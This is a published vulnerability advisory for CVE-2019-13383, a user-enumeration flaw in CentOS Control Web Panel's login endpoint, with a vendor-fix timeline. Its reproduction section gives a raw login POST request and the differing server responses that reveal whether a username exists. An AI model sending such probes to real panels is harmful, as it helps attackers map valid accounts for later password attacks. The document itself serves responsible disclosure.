# Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.848 User Enumeration via HTTP Response Message # Date: 15 July 2019 # Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak # Vendor Homepage: https://control-webpanel.com/changelog # Software Link: Not available, user panel only available for lastest version # Version: 0.9.8.836 to 0.9.8.847 # Tested on: CentOS 7.6.1810 (Core) # CVE : CVE-2019-13383 # ==================================================================== # Information # ==================================================================== Product : CWP Control Web Panel version : 0.9.8.838 Fixed on : 0.9.8.848 Test on : CentOS 7.6.1810 (Core) Reference : https://control-webpanel.com/ CVE-Number : 2019-13383 # ==================================================================== # Root course of the vulnerability # ==================================================================== The server response different message between login with valid and invalid user. This allows attackers to check whether a username is valid by reading the HTTP response. # ==================================================================== # Steps to Reproduce # ==================================================================== 1. Login with a random user by using invalid password POST /login/index.php?acc=validate HTTP/1.1 Host: 192.168.80.137:2083 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 csrftoken: d41d8cd98f00b204e9800998ecf8427e X-Requested-With: XMLHttpRequest Content-Length: 30 Connection: close Referer: https://192.168.80.137:2083/login/?acc=logon username=AAA&password=c2Rmc2Rm 2. Check the HTTP response body 2.1 User does not exist (server response suspended) HTTP/1.1 200 OK Server: cwpsrv Date: Mon, 15 Jul 2019 01:39:06 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/7.0.32 Content-Length: 9 suspended 2.2 User does exist (server response nothing) HTTP/1.1 200 OK Server: cwpsrv Date: Mon, 15 Jul 2019 01:40:12 GMT Content-Type: text/html; charset=UTF-8 Connection: close X-Powered-By: PHP/7.0.32 Content-Length: 0 3. HTTP response body format depends on software version, but all of them keep responding differently as the example below ------------------------------------------------------------ | Username | Password | Result | ------------------------------------------------------------ | valid | valid | login success | | valid | invalid | {"error":"failed"} | | invalid | invalid | {"error":"user_invalid"} | ------------------------------------------------------------ # ==================================================================== # PoC # ==================================================================== https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13383.md # ==================================================================== # Timeline # ==================================================================== 2019-07-06: Discovered the bug 2019-07-06: Reported to vendor 2019-07-06: Vender accepted the vulnerability 2019-07-11: The vulnerability has been fixed 2019-07-15: Published # ==================================================================== # Discovered by # ==================================================================== Pongtorn Angsuchotmetee Nissana Sirijirakal Narin Boonwasanarak